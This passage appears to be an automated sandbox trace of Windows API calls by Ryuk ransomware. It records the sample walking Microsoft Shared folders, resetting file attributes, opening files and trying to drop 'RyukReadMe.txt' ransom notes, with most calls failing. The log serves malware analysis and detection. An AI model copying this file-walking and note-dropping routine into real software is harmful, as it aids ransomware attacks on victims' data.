shared\\fonts\\whgtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.329] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.329] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.329] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX", dwFileAttributes=0x80) returned 0 [0133.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.330] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.330] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX", dwFileAttributes=0x80) returned 0 [0133.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.330] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.330] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.330] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.331] SetLastError (dwErrCode=0x0) [0133.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.334] GetLastError () returned 0x5 [0133.334] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.334] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.334] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.334] SetLastError (dwErrCode=0x0) [0133.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.334] GetLastError () returned 0x5 [0133.334] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.334] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.334] SetLastError (dwErrCode=0x0) [0133.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.334] GetLastError () returned 0x5 [0133.334] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.334] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.335] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.335] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.335] SetLastError (dwErrCode=0x0) [0133.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.335] GetLastError () returned 0x5 [0133.335] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.336] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.337] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.337] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.337] SetLastError (dwErrCode=0x0) [0133.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.338] GetLastError () returned 0x5 [0133.338] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.338] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0133.338] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.338] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.338] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.338] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0133.338] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0133.338] SetLastError (dwErrCode=0x0) [0133.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.339] GetLastError () returned 0x5 [0133.339] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.339] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.339] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config", dwFileAttributes=0x80) returned 0 [0133.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.340] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.340] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.340] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.340] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.340] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.340] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.340] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.340] SetLastError (dwErrCode=0x0) [0133.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.340] GetLastError () returned 0x5 [0133.340] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.340] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.340] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.340] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.340] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.340] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb", dwFileAttributes=0x80) returned 0 [0133.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.341] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.341] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.341] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.341] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.341] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb", dwFileAttributes=0x80) returned 0 [0133.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.342] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.342] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.342] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.342] SetLastError (dwErrCode=0x0) [0133.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.342] GetLastError () returned 0x5 [0133.342] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.342] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.342] SetLastError (dwErrCode=0x0) [0133.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.342] GetLastError () returned 0x5 [0133.343] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.343] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.343] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.343] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.344] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.344] SetLastError (dwErrCode=0x0) [0133.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.344] GetLastError () returned 0x5 [0133.344] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.344] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.344] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.344] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.344] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.344] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.344] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.344] SetLastError (dwErrCode=0x0) [0133.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.344] GetLastError () returned 0x5 [0133.344] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.345] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.345] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.345] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.345] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.345] SetLastError (dwErrCode=0x0) [0133.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.345] GetLastError () returned 0x5 [0133.345] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.345] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.345] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.345] SetLastError (dwErrCode=0x0) [0133.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.345] GetLastError () returned 0x5 [0133.345] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.345] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.345] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.346] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.346] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.346] SetLastError (dwErrCode=0x0) [0133.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.346] GetLastError () returned 0x5 [0133.346] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.346] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.346] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.346] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.346] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.346] SetLastError (dwErrCode=0x0) [0133.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.347] GetLastError () returned 0x5 [0133.347] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.347] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.347] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0133.350] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.350] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.350] SetLastError (dwErrCode=0x0) [0133.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.350] GetLastError () returned 0x5 [0133.350] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0133.350] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.350] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0133.350] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0133.350] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0133.350] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG", dwFileAttributes=0x80) returned 0 [0133.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.351] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.351] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0133.351] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0133.351] SetLastError (dwErrCode=0x0) [0133.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.351] GetLastError () returned 0x5 [0133.351] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0133.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.351] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.351] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.351] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0133.351] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0133.352] SetLastError (dwErrCode=0x0) [0133.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.352] GetLastError () returned 0x5 [0133.352] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.352] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.352] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.353] SetLastError 